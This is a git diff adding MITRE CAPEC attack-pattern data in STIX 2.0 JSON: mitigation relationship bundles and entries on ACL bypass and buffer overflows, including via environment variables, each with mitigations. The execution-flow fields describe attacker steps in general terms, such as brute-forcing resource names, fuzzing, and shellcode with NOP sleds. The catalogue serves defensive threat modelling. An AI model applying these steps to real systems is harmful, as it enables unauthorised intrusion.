"attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ff83398b-e67f-4c7c-be17-3abbb20aa2d9.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ff83398b-e67f-4c7c-be17-3abbb20aa2d9.json new file mode 100644 index 0000000000000000000000000000000000000000..95926c20998d41a342b8873aedc2caa39c74f910 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ff83398b-e67f-4c7c-be17-3abbb20aa2d9.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--7ab14b53-22a9-4c9c-8acf-447f1726de72", + "objects": [ + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ff83398b-e67f-4c7c-be17-3abbb20aa2d9", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ff8ccce6-92b5-43da-81bf-6559100321b4.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ff8ccce6-92b5-43da-81bf-6559100321b4.json new file mode 100644 index 0000000000000000000000000000000000000000..974f7ee6a22506fec862c70ee389dafec7f05a5d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ff8ccce6-92b5-43da-81bf-6559100321b4.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--b708b9eb-a72d-41d5-b5cd-0c35eaf16311", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ff8ccce6-92b5-43da-81bf-6559100321b4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--69b6bab3-0a47-402a-b11e-6f7897b75465", + "target_ref": "attack-pattern--51cf3883-1993-49d1-a6c6-169cabf71adb", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ffb905de-a976-4ece-aa2c-96b818a64df0.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ffb905de-a976-4ece-aa2c-96b818a64df0.json new file mode 100644 index 0000000000000000000000000000000000000000..5c36f5c135c9ecb076f6394edba5cfd30ada8075 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ffb905de-a976-4ece-aa2c-96b818a64df0.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--9a3cd48a-9338-4770-92f3-93b51bb952bc", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffb905de-a976-4ece-aa2c-96b818a64df0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ffba3f90-bbb1-4ab0-bf6a-750ca56acabd.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ffba3f90-bbb1-4ab0-bf6a-750ca56acabd.json new file mode 100644 index 0000000000000000000000000000000000000000..ff8225542638860ce0a46883de6daff747d26e25 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ffba3f90-bbb1-4ab0-bf6a-750ca56acabd.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--fc5a2f7b-40c2-4e09-9ccd-5c40d190f48a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffba3f90-bbb1-4ab0-bf6a-750ca56acabd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ffcda0d4-63d6-4980-9ad1-5627a39ccb6e.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ffcda0d4-63d6-4980-9ad1-5627a39ccb6e.json new file mode 100644 index 0000000000000000000000000000000000000000..dcc76eda7a33103156bff64aefcaba8f94b80a08 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ffcda0d4-63d6-4980-9ad1-5627a39ccb6e.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--4ef8da62-a430-4819-8f60-08690b779b84", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffcda0d4-63d6-4980-9ad1-5627a39ccb6e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--676ce84f-78c4-40f9-96e2-d65ddbfb6b69", + "target_ref": "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/stix-capec.json b/cti-ATT-CK-v13.1/capec/2.0/stix-capec.json new file mode 100644 index 0000000000000000000000000000000000000000..1169eb1ce124c8b4dd8a244c4e415a694cdfa8da --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/stix-capec.json 
@@ -0,0 +1,68809 @@ +{ + "id": "bundle--7783ea03-9f14-4d80-8b9a-c1a6ff015378", + "objects": [ + { + "created": "2023-01-30T20:31:22.120362Z", + "definition": { + "statement": "CAPEC is sponsored by US-CERT in the office of Cybersecurity and Communications at the U.S. Department of Homeland Security. Copyright © 2007 - 2023, The MITRE Corporation. CAPEC and the CAPEC logo are trademarks of The MITRE Corporation." + }, + "definition_type": "statement", + "id": "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d", + "type": "marking-definition" + }, + { + "created": "2023-01-30T20:31:22.121Z", + "id": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "identity_class": "organization", + "modified": "2023-01-30T20:31:22.121Z", + "name": "The MITRE Corporation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "identity" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. 
Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.", + "external_references": [ + { + "external_id": "CAPEC-1", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/1.html" + }, + { + "external_id": "CWE-276", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/276.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-434", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/434.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-1191", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1191.html" + }, + { + "external_id": "CWE-1193", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1193.html" + }, + { + "external_id": "CWE-1220", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1220.html" + }, + { + "external_id": "CWE-1297", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1297.html" + }, + { + "external_id": "CWE-1311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1311.html" + }, + { + "external_id": "CWE-1314", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1314.html" + }, + { + "external_id": "CWE-1315", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1315.html" + }, + { + "external_id": "CWE-1318", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1318.html" + }, + { + "external_id": "CWE-1320", + "source_name": "cwe", + "url": 
"http://cwe.mitre.org/data/definitions/1320.html" + }, + { + "external_id": "CWE-1321", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1321.html" + }, + { + "external_id": "CWE-1327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1327.html" + }, + { + "description": "Hijack Execution Flow: ServicesFile Permissions Weakness", + "external_id": "T1574.010", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/010" + } + ], + "id": "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Accessing Functionality Not Properly Constrained by ACLs", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_child_of_refs": [ + "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Implementing the Model-View-Controller (MVC) within Java EE's Servlet paradigm using a \"Single front controller\" pattern that demands that brokered HTTP requests be authenticated before hand-offs to other Action Servlets.\n If no security-constraint is placed on those Action Servlets, such that positively no one can access them, the front controller can be subverted.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey: The attacker surveys the target application, possibly as a valid and authenticated user

  2. Techniques
    Spidering web sites for all available links
    Brute force guessing of resource names
    Brute force guessing of user names / credentials
    Brute force guessing of function names / actions
  3. Identify Functionality: At each step, the attacker notes the resource or functionality access mechanism invoked upon performing specific actions

  4. Techniques
    Use the web inventory of all forms and inputs and apply attack data to those inputs.
    Use a packet sniffer to capture and record network traffic
    Execute the software in a debugger and record API calls into the operating system or important libraries. This might occur in an environment other than a production environment, in order to find weaknesses that can be exploited in a production environment.

Experiment

  1. Iterate over access capabilities: Possibly as a valid user, the attacker then tries to access each of the noted access mechanisms directly in order to perform functions not constrained by the ACLs.

  2. Techniques
    Fuzzing of API parameters (URL parameters, OS API parameters, protocol parameters)
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "attack-pattern--e8a8a8f5-3ad5-4d3f-a35b-48036147266b" + ], + "x_capec_prerequisites": [ + "The application must be navigable in a manner that associates elements (subsections) of the application with ACLs.", + "The various resources, or individual URLs, must be somehow discoverable by the attacker", + "The administrator must have forgotten to associate an ACL or has associated an inappropriately permissive ACL with a particular navigable resource." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "In order to discover unrestricted resources, the attacker does not need special tools or skills. They only have to observe the resources or access mechanisms invoked as each action is performed and then try and access those access mechanisms directly." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n In a J2EE setting, administrators can associate a role that is impossible for the authenticator to grant users, such as \"NoAccess\", with all Servlets to which access is guarded by a limited number of servlets visible to, and accessible by, the user.\n Having done so, any direct access to those protected Servlets will be prohibited by the web container.\n In a more general setting, the administrator must mark every resource besides the ones supposed to be exposed to the user as accessible by a role impossible for the user to assume. 
The default security setting must be to deny access and then grant access only to those resources intended by business logic.\n ", + "id": "course-of-action--0d8de0b8-e9fd-44b2-8f1f-f8aae79949be", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-1-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c796a053-8016-4098-9d01-e680e042cb24", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0d8de0b8-e9fd-44b2-8f1f-f8aae79949be", + "target_ref": "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the adversary finds that they can modify an environment variable, they may try to overflow associated buffers. 
This attack leverages implicit trust often placed in environment variables.", + "external_references": [ + { + "external_id": "CAPEC-10", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/10.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-99", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/99.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-733", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "Buffer Overflow via Environment Variables", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Buffer_Overflow_via_Environment_Variables" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Sharefuzz", + "external_id": "REF-2", + "source_name": "reference_from_CAPEC", + "url": "http://sharefuzz.sourceforge.net" + } + ], + "id": "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Buffer Overflow via Environment Variables", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A buffer overflow in sccw allows local users to gain root access via the $HOME environmental variable. See also: CVE-1999-0906\n ", + "\n A buffer overflow in the rlogin program involves its consumption of the $TERM environmental variable. See also: CVE-1999-0046\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. In this attack the adversary looks for an application that loads the content of an environment variable into a buffer.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

  2. Techniques
    Change the values of environment variables thought to be used by the application to contain excessive data. If the program is loading the value of the environment variable into a buffer, this could cause a crash and an attack vector will be found.
  3. Craft overflow content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

  4. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary injects the crafted overflow content into the buffer.

", + "x_capec_extended_description": "Although the focus of this attack is putting excessive content into an environment variable that is loaded into a buffer, environment variables can be used to assist a classic buffer overflow attack as well. In the case where the buffer used in a traditional buffer overflow attack is not large enough to store the adversary's shell code, they will store the shell code in an environment variable and attempt to return to its address, rather than back into the data they wrote to the buffer.", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application uses environment variables.", + "An environment variable exposed to the user is vulnerable to a buffer overflow.", + "The vulnerable environment variable uses untrusted data.", + "Tainted data used in the environment variables is not properly validated. For instance boundary checking is not done before copying the input data to a buffer." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not expose environment variable to the user.", + "id": "course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-10-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6afe60c3-f515-4128-a724-0989e27e5bb0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b", + "target_ref": "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not use untrusted data in your environment variables.", + "id": "course-of-action--76f448da-5586-4aae-b516-46ff7c52ba87", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-10-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--371669b4-ddf9-41df-b755-093aa08a1c2d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--76f448da-5586-4aae-b516-46ff7c52ba87", + "target_ref": "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a language or compiler that performs automatic bounds checking", + "id": "course-of-action--950e1236-9a75-40d0-a5f7-1c1777109da5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-10-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5981e722-08a7-4513-8c85-f487b377ebfb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--950e1236-9a75-40d0-a5f7-1c1777109da5", + "target_ref": "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "There are tools such as Sharefuzz [REF-2] which is an environment variable fuzzer for Unix that support loading a shared library. 
You can use Sharefuzz to determine if you are exposing an environment variable vulnerable to buffer overflow.", + "id": "course-of-action--9a8c3aec-f2ce-4b6e-b416-33f58933ac90", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-10-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d48d20f4-9361-40f9-81b3-74f2f8b86bea", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9a8c3aec-f2ce-4b6e-b416-33f58933ac90", + "target_ref": "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an adversary. 
As a consequence, an adversary is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the adversaries' choice.", + "external_references": [ + { + "external_id": "CAPEC-100", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/100.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-131", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/131.html" + }, + { + "external_id": "CWE-129", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/129.html" + }, + { + "external_id": "CWE-805", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/805.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "description": "Buffer Overflow", + "external_id": "07", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Buffer-Overflow" + }, + { + "description": "Buffer overflow attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Buffer_overflow_attack" + }, + { + "description": "OWASP Vulnerabilities, The Open Web Application Security Project (OWASP)", + "external_id": "REF-620", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-community/vulnerabilities/Buffer_Overflow" + } + ], + "id": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Overflow Buffers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + 
"attack-pattern--476ca631-2695-43f8-82f6-83c06a07ae36" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The most straightforward example is an application that reads in input from the user and stores it in an internal buffer but does not check that the size of the input data is less than or equal to the size of the buffer. If the user enters excessive length data, the buffer may overflow leading to the application crashing, or worse, enabling the user to cause execution of injected code.", + "Many web servers enforce security in web applications through the use of filter plugins. An example is the SiteMinder plugin used for authentication. An overflow in such a plugin, possibly through a long URL or redirect parameter, can allow an adversary not only to bypass the security checks but also execute arbitrary code on the target web server in the context of the user that runs the web server process." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. Adversaries often look for applications that accept user input and that perform manual memory management.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

  2. Techniques
    Provide large input to a program or application and observe the behavior. If there is a crash, this means that a buffer overflow attack is possible.
  3. Craft overflow content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

  4. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary injects the crafted overflow content into the buffer.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "attack-pattern--4b856ceb-8bf7-4f0e-b423-89a420455b1d", + "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "attack-pattern--e61f5dd9-d26e-454f-ab07-171f3dea6e73", + "attack-pattern--4cd18074-15c1-4206-8391-115685669623", + "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33" + ], + "x_capec_prerequisites": [ + "Targeted software performs buffer operations.", + "Targeted software inadequately performs bounds-checking on buffer operations.", + "Adversary has the capability to influence the input to buffer operations." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Detecting and exploiting a buffer overflow does not require any resources beyond knowledge of and access to the target system." + ], + "x_capec_skills_required": { + "High": "In cases of directed overflows, where the motive is to divert the flow of the program or application as per the adversaries' bidding, high level skills are required. This may involve detailed knowledge of the target system architecture and kernel.", + "Low": "In most cases, overflowing a buffer does not require advanced skills beyond the ability to notice an overflow and stuff an input variable with content." 
